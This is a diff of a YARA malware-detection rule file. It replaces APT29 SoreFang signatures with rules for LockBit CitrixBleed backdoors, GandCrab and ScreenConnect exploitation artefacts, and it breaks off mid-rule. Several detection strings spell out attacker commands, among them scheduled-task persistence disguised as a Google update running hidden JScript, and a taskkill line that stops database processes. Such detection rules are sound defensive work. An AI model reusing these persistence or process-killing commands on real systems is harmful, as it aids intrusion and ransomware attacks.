+		$x2 = "wscript.exe /b /e:jscript C:\\Users\\" ascii
+		$x3 = "schtasks /Create /f /tn \"GoogleUpdateTaskMachineSystem\" /tr \"wscript.exe" ascii nocase
+		$x4 = "schtasks /Delete /F /TN \"\"GoogleUpdateTaskMachineCore" ascii nocase
+		$x5 = "schtasks /Delete /F /TN \"GoogleUpdateTaskMachineCore" ascii nocase
+		$x6 = "wscript.exe //b /e:jscript %TMP%\\debug.txt" ascii
+		$s1 = "/?page=wait" fullword ascii
+		$a1 = "autoit3.exe" fullword ascii
+		$a2 = "dumpcap.exe" fullword ascii
+		$a3 = "tshark.exe" fullword ascii
+		$a4 = "prl_cc.exe" fullword ascii
+		$v1 = "vmware" fullword ascii
+		$v2 = "PCI\\\\VEN_80EE&DEV_CAFE" fullword ascii
+		$v3 = "VMWVMCIHOSTDEV" fullword ascii
+		$c1 = "apowershell" fullword ascii
+		$c2 = "wpowershell" fullword ascii
+		$c3 = "get_passwords" fullword ascii
+		$c4 = "kill_process" fullword ascii
+		$c5 = "get_screen" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( 1 of ( $x* ) or all of ( $a* ) or all of ( $v* ) or 3 of ( $c* ) ) ) or 5 of them
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Round_Function : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_DLL_Nov23_1 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on the encryption round function"
-		author = "NCSC"
-		id = "0be1c084-c8df-5920-a320-90364a7fb542"
-		date = "2016-12-30"
+		description = "Detects a backdoor DLL, that was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "3588d437-b561-5380-8dac-73a31f4cdb5a"
+		date = "2023-11-23"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L201-L214"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "c4979b7ec31581b43b6975be5d4b1bfa5562e5fe25bbb51bb7c388550ed80ac6"
-		score = 75
+		logic_hash = "6788d37301bb82bd4d9584e192e2fb14d4f6c77801b70299097d8ba139219394"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63"
+		hash2 = "0eb66eebb9b4d671f759fb2e8b239e8a6ab193a732da8583e6e8721a2670a96d"
 
 	strings:
-		$ = { 8A E9 8A FB 8A 5D 0F 02 C9 88 45 0F FE C1 0F BE C5 88 6D F3 8D
-            14 45 01 00 00 00 0F AF D0 0F BE C5 0F BE C9 0F AF C8 C1 FA 1B C0 E1 05 0A D1 8B 4D EC 0F BE C1 89 55 E4 8D 14 45 01 00 00 00 0F AF D0 8B C1}
+		$s1 = "ERROR GET INTERVAL" ascii
+		$s2 = "OFF HIDDEN MODE" ascii
+		$s3 = "commandMod:" ascii
+		$s4 = "RESULT:" ascii
+		$op1 = { C7 44 24 ?? 01 00 00 00 C7 84 24 ?? ?? ?? ?? FF FF FF FF 83 7C 24 ?? 00 74 ?? 83 BC 24 ?? ?? ?? ?? 00 74 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 00 04 00 00 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 }
+		$op2 = { 48 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 03 00 00 00 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8D 0D ?? ?? ?? ?? 44 0F B7 05 ?? ?? ?? ?? 48 8B D0 48 8B 4C 24 ?? FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Add_Random_Commas_Spaces : FILE
+rule SIGNATURE_BASE_MAL_Trojan_DLL_Nov23 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on function that adds commas and spaces"
-		author = "NCSC"
-		id = "9a89c619-6309-500f-b4dc-c8a3e8fc4417"
-		date = "2016-12-30"
+		description = "Detects a trojan DLL that installs other components - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "1dd87d0a-2b8b-5386-8fdd-40d184c731a4"
+		date = "2023-11-23"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L216-L229"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L24-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "046e222aabc9e596d9536702521b4729d990e1f327ded004ca984b73a8511a83"
-		score = 75
+		logic_hash = "9be42742711b4d0440244b507945e074b61c456588580b3263f899a7eb84d8aa"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
 
 	strings:
-		$ = { E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B CE 83 FA 04 7E 09 6A
-            02 68 ?? ?? ?? ?? EB 07 6A 01 68 }
+		$op1 = { C7 84 24 ?? ?? ?? ?? 52 70 63 53 C7 84 24 ?? ?? ?? ?? 74 72 69 6E C7 84 24 ?? ?? ?? ?? 67 42 69 6E C7 84 24 ?? ?? ?? ?? 64 69 6E 67 C7 84 24 ?? ?? ?? ?? 43 6F 6D 70 C7 84 24 ?? ?? ?? ?? 6F 73 65 41 C7 84 24 ?? ?? ?? ?? 00 40 01 01 }
+		$op2 = { C7 84 24 ?? ?? ?? ?? 6C 73 61 73 C7 84 24 ?? ?? ?? ?? 73 70 69 72 66 C7 84 24 ?? ?? 00 00 70 63 }
+		$op3 = { C7 84 24 ?? ?? ?? ?? 4E 64 72 43 C7 84 24 ?? ?? ?? ?? 6C 69 65 6E C7 84 24 ?? ?? ?? ?? 74 43 61 6C C7 84 24 ?? ?? ?? ?? 6C 33 00 8D }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Modify_Alphabet_Custom_Encode : FILE
+rule SIGNATURE_BASE_MAL_DLL_Stealer_Nov23 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on arguments passed into custom encoding algorithm function"
-		author = "NCSC"
-		id = "7c5c1be0-ccad-5c8f-a026-445994b1f279"
-		date = "2016-12-30"
+		description = "Detects a DLL that steals authentication credentials - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "9cfed8ec-1d04-53d7-88ef-2576075cfc33"
+		date = "2023-11-23"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L231-L243"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L41-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "f0f5bcad52b0b15dc74a51973ef2752234bd12d677c846b2f96fe569d906ea3b"
-		score = 75
+		logic_hash = "7d0c46d855973cb2c0636aed9c67cfbe47ca260ab1bc842fef1d532725c26910"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
 
 	strings:
-		$ = { 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46
-            64 }
+		$op1 = { C7 45 ?? 4D 69 6E 69 C7 45 ?? 44 75 6D 70 C7 45 ?? 57 72 69 74 C7 45 ?? 65 44 75 6D C7 45 ?? 70 00 27 00 C7 45 ?? 44 00 62 00 C7 45 ?? 67 00 68 00 C7 45 ?? 65 00 6C 00 C7 45 ?? 70 00 2E 00 C7 45 ?? 64 00 6C 00 C7 45 ?? 6C 00 00 00}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Custom_Encode_Decode : FILE
+rule SIGNATURE_BASE_MAL_Python_Backdoor_Script_Nov23 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on the custom encoding/decoding algorithm function"
-		author = "NCSC"
-		id = "4885a659-bb3a-5e33-99cc-b827931bf58f"
-		date = "2016-12-30"
+		description = "Detects a trojan (written in Python) that communicates with c2 - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "861f9ce3-3c54-5c56-b50b-2b7536783f6e"
+		date = "2023-11-23"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L245-L274"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L56-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "536147bda9603d68748010f9db260af732fe0865a601ae1104538933b19c519b"
-		score = 75
+		logic_hash = "b336f6438a420af49b1b0144039f1051f12c0c54f77a94e2f947f71d1f6230b3"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
 
 	strings:
-		$ = { 55 8B EC 8B D1 53 56 8B 75 08 8B DE 80 42 62 FA 8A 4A 62 66 D3
-            EB 57 3A 5A 5C 74 0F}
-		$ = { 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE C1 88 4A 62 8A
-            4A 62 B8 01 00 00 00}
-		$ = { 8A 46 62 84 C0 74 3E 3C 06 73 12 0F B6 C0 B9 06 00 00 00 2B C8
-            C6 46 62 06 66 D3 66 60 0F B7 4E 60}
-		$ = { 80 3C 38 0D 0F 84 93 01 00 00 C6 42 62 06 8B 56 14 83 FA 10 72
-            04 8B 06}
-		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5B 3B C8 75 07 8B 55 EC B3 3E}
-		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5E 3B C8 75 0B 8B 55 EC D0 EB C6
-            42 62 05}
-		$ = { 8B 55 EC 0F BE 04 38 0F B6 DB 0F B6 4A 5F 3B C1 B8 3F 00 00 00
-            0F 44 D8}
-		$ = { 8A 4A 62 66 8B 52 60 66 D3 E2 0F B6 C3 66 0B D0 8B 45 EC 66 89
-            50 60 8A 45 F3 02 C1 88 45 F3 3C 08 72 2E 04 F8 8A C8 88 45 F3
-            66 D3 EA 8B 4D 08 0F B6 C2 50 }
-		$ = { 3A 5A 5C 74 0F 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE
-            C1 88 4A 62 }
+		$s1 = "port = 443 if \"https\"" ascii
+		$s2 = "winrm.Session basic error" ascii
+		$s3 = "Windwoscmd.run_cmd(str(cmd))" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Remove_Chars_Comma_Space_Dot : FILE
+rule SIGNATURE_BASE_APT_RANSOM_Lockbit_Forensicartifacts_Nov23
 {
 	meta:
-		description = "Rule to detect SoreFang based on function that removes commas, spaces and dots"
-		author = "NCSC"
-		id = "c15779b0-6a5e-5345-94ad-95615b567f1f"
-		date = "2016-12-30"
+		description = "Detects patterns found in Lockbit TA attacks exploiting Citrixbleed vulnerability CVE 2023-4966"
+		author = "Florian Roth"
+		id = "04bde599-2a5b-5a33-a6f1-67d57a564946"
+		date = "2023-11-22"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L276-L289"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L73-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "652607e0cfe6f5ad6ede169e28f63e8262fc37cbc7baa2525e52e79572d9a468"
+		logic_hash = "6ba1d47e2cac72143c4612c420777024f114afc007c7b15251a58819654aeff1"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = {8A 18 80 FB 2C 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
-		$ = {8A 18 80 FB 2E 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
-		$ = {8A 18 80 FB 20 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
+		$x1 = "taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe"
+		$x2 = " 1> \\\\127.0.0.1\\admin$\\__"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
+		1 of ( $x* )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Disk_Enumeration_Strings : FILE
+
+rule SIGNATURE_BASE_MAL_Gandcrab_Apr18_1 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on disk enumeration strings"
-		author = "NCSC"
-		id = "0ff01793-6fb7-5cff-b4e4-6709269ab0f0"
-		date = "2016-12-30"
+		description = "Detects GandCrab malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ef7983cd-a7b3-5ce2-8cff-1bcf35bc6140"
+		date = "2018-04-23"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L291-L310"
+		reference = "https://twitter.com/MarceloRivero/status/988455516094550017"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mal_grandcrab.yar#L3-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
-		logic_hash = "4a225b767dc922625c333aea866638bc5e239137592e46c17563b9cc380b0eea"
+		logic_hash = "70fc8deb91126a7404095aaa512e9b7542fe8605f83a037a10f8ccff76c27d4f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$ = "\x0D\x0AFree on disk: "
-		$ = "Total disk: "
-		$ = "Error in GetDiskFreeSpaceEx\x0D\x0A"
-		$ = "\x0D\x0AVolume label: "
-		$ = "Serial number: "
-		$ = "File system: "
-		$ = "Error in GetVolumeInformation\x0D\x0A"
-		$ = "I can not het information about this disk\x0D\x0A"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6fafe7bb56fd2696f2243fc305fe0c38f550dffcfc5fca04f70398880570ffff"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "7936b0e9491fd747bf2675a7ec8af8ba"
 }
-rule SIGNATURE_BASE_Gen_Macro_Shellexecute_Action : FILE
+rule SIGNATURE_BASE_Connectwise_Screenconnect_Authentication_Bypass_Feb_2024_Exploitation_IIS_Logs
 {
 	meta:
-		description = "VBA macro technique to call ShellExecute to launch payload"
-		author = "John Lambert @JohnLaTwC"
-		id = "4ae3d3d9-de4a-5c5c-9a4a-bedc80b576be"
-		date = "2019-01-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1091170625698316288"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_macro_ShellExecute_action.yar#L1-L33"
+		description = "Detects an http request to '/SetupWizard.aspx/' with anything following it, which when found in IIS logs is a potential indicator of compromise of the 2024 ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
+		author = "Huntress DE&TH Team (modified by Florian Roth)"
+		id = "2886530b-e164-4c4b-b01e-950e3c40acb4"
+		date = "2024-02-20"
+		modified = "2024-02-21"
+		reference = "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da40175579f7d76d10ad0188851f111ba5d875ce990b2940166dd28eac2a742d"
+		logic_hash = "f6c7a3aa2ed98e754f9523c55eb035c7bc5f8aea96a6f86c729e9658d78710fb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		note = "This rule only works on VT or systems that perform macro subfile extraction"
-		hash1 = "0878eec9ecae493659e42c1d87588573c1e6fc30acf7a59e6fdb5296b1c198ef"
-		hash2 = "a0963ac15339c9803b4355fd71b68bf6ddedad960d5b3ad40bae873263470191"
-		hash3 = "dd094e44a817604596d1ab06ca6e9597d49ca0a2cbe9239c73ceaad70265ec2a"
-		hash4 = "7b9094ea41e89379c7048ef784ef494c4597ea0d31b707dcb9c8495f241f5fb0"
-		hash5 = "35d8242726b905882bbfcf2770f84cb6f40552e76bff8fb0082ca10de3d61e54"
-		hash6 = "bf9ff20d814bf21d46a22abbd7a8ad0276145807f9adf8d2787df9e3fce3f35d"
-		hash7 = "77966004fcbff147f6923b3405ad9ad4e1dda42d0931564d0cdc4c7e1c91106a"
-		hash8 = "c77c8033a1e5f694fa119dd7f78811f6015726822121b9414fc01e7de8770447"
+		tags = ""
 
 	strings:
-		$com1a = "00A0C91F3880"
-		$com1b = "C08AFD90"
-		$com2a = "00A0C90A8F39"
-		$com2b = "9BA05972"
-		$s3 = "ShellExecute" fullword
-		$s4 = "GetObject" fullword
+		$s1 = " GET /SetupWizard.aspx/" ascii
+		$s2 = " POST /SetupWizard.aspx/" ascii
+		$s3 = " PUT /SetupWizard.aspx/" ascii
+		$s4 = " HEAD /SetupWizard.aspx/" ascii
 
 	condition:
-		filesize < 1MB and ( uint32be( 0 ) == 0x41747472 or uint32be( 0 ) == 0x61747472 or uint32be( 0 ) == 0x41545452 ) and all of ( $s* ) and ( all of ( $com1* ) or all of ( $com2* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_WIN_Ralordv1_Apr25 : FILE
+rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Unused_Feb24 : FILE
 {
 	meta:
-		description = "This ISH Tecnologia Yara rule, detects the main components of the first version of RALord Ransomware"
-		author = "0x0d4y-Icaro Cesar"
-		id = "67254633-3597-4770-9806-8b2e26c8f66a"
-		date = "2025-04-01"
-		modified = "2025-04-18"
-		reference = "https://ish.com.br/wp-content/uploads/2025/04/RALord-Novo-grupo-de-Ransomware-as-a-Service-1.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ralordv1_win_ap25.yar#L1-L29"
+		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account wasn't actually used yet to login"
+		author = "Florian Roth"
+		id = "c57e6c6a-298f-5ff3-b76a-03127ff88699"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L20-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "be15f62d14d1cbe2aecce8396f4c6289"
-		logic_hash = "75d20cca5eb48109bbb3b0ab0ce2efb4f2d89bc1984df8c4fddf1f859d069750"
-		score = 80
+		logic_hash = "2433ad11ca1d9f970eb3c536a13f07e808c2a0b8b0dd625dffbe4947268ab8f5"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.ralord"
 
 	strings:
-		$code_pattern_quarterround = { 4? 31 ?? 48 8b ?? ?? ?? 4? 31 ?? 48 8b ?? ?? ?? 31 e8 4? 31 ?? 41 c1 ?? 0c c1 ?? 0c c1 ?? 0c 48 89 c2 c1 ?? 0c }
-		$code_pattern_custom_alg = { 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 48 83 c0 08 48 3d 8? }
-		$ralord_str_I = "chacha" ascii
-		$ralord_str_II = "scorp" ascii
-		$ralord_str_III = "RALord" ascii
-		$ralord_str_IV = "onion" ascii
-		$ralord_str_V = "/rust" ascii
-		$ralord_str_VI = "BCryptGenRandom" ascii
+		$a1 = "<Users xmlns:xsi="
+		$a2 = "<CreationDate>"
+		$s1 = "@poc.com</Email>"
+		$s2 = "<LastLoginDate>0001"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $code_pattern_* ) and 4 of ( $ralord_str_* )
+		filesize < 200KB and all of ( $a* ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_Sharpshooter_Excel4 : FILE
+rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Used_Feb24 : FILE
 {
 	meta:
-		description = "Detects Excel documents weaponized with Sharpshooter"
-		author = "John Lambert, Florian Roth"
-		id = "a79e3afe-e8f9-5e56-a131-bb1b346df471"
-		date = "2020-03-27"
-		modified = "2023-12-05"
-		reference = "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/00b5dd7d-51ca-4938-b7b7-483fe0e5933b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_Excel4Macro_Sharpshooter.yar#L1-L25"
+		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account was already used yet to login"
+		author = "Florian Roth"
+		id = "91990558-f145-5968-9722-b6815f6ad8d5"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L40-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d"
-		logic_hash = "4aec8bb7ec8ce7ebd8228416133ea7eec995864aeec78c11548387d832b5fa65"
-		score = 70
+		logic_hash = "50967a07a9789f20ccbc882c3b9e3142f0c28068c0a58b9d8927d725d02bf289"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$header_docf = { D0 CF 11 E0 }
-		$s1 = "Excel 4.0 Macros"
-		$f1 = "CreateThread" ascii fullword
-		$f2 = "WriteProcessMemory" ascii fullword
-		$f3 = "Kernel32" ascii fullword
-		$concat = { 00 41 6f 00 08 1e ?? 00 41 6f 00 08 1e ?? 00 41 6f 00 08}
+		$a1 = "<Users xmlns:xsi="
+		$a2 = "<CreationDate>"
+		$s1 = "@poc.com</Email>"
+		$f1 = "<LastLoginDate>0001"
 
 	condition:
-		filesize < 1000KB and $header_docf at 0 and #concat > 10 and $s1 and 2 of ( $f* )
+		filesize < 200KB and all of ( $a* ) and $s1 and not 1 of ( $f* )
 }
-rule SIGNATURE_BASE_SUSP_Excel4Macro_Autoopen : FILE
+rule SIGNATURE_BASE_SUSP_Screenconnect_Exploitation_Artefacts_Feb24 : SCRIPT
 {
 	meta:
-		description = "Detects Excel4 macro use with auto open / close"
-		author = "John Lambert @JohnLaTwC"
-		id = "cfed97fe-b330-5528-8402-08c6ba6af04a"
-		date = "2020-03-26"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_Excel4Macro_Sharpshooter.yar#L27-L69"
+		description = "Detects post exploitation indicators observed by HuntressLabs in relation to the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
+		author = "Florian Roth"
+		id = "079f4153-8bc7-574f-b6fa-af5536b842ab"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L62-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"
-		logic_hash = "074aab8e1d3b66e34e8e8d8e8489e1dfee1091df0424b22cd1bfd3cf904754e1"
-		score = 50
-		quality = 85
-		tags = "FILE"
+		logic_hash = "6f0d5f878847da1afb0d7b83e84bd337cfa67c36da2cbb33af712ed4ffad490a"
+		score = 75
+		quality = 83
+		tags = "SCRIPT"
 
 	strings:
-		$header_docf = { D0 CF 11 E0 }
-		$s1 = "Excel" fullword
-		$Auto_Open = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
-		$Auto_Close = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
-		$Auto_Open1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
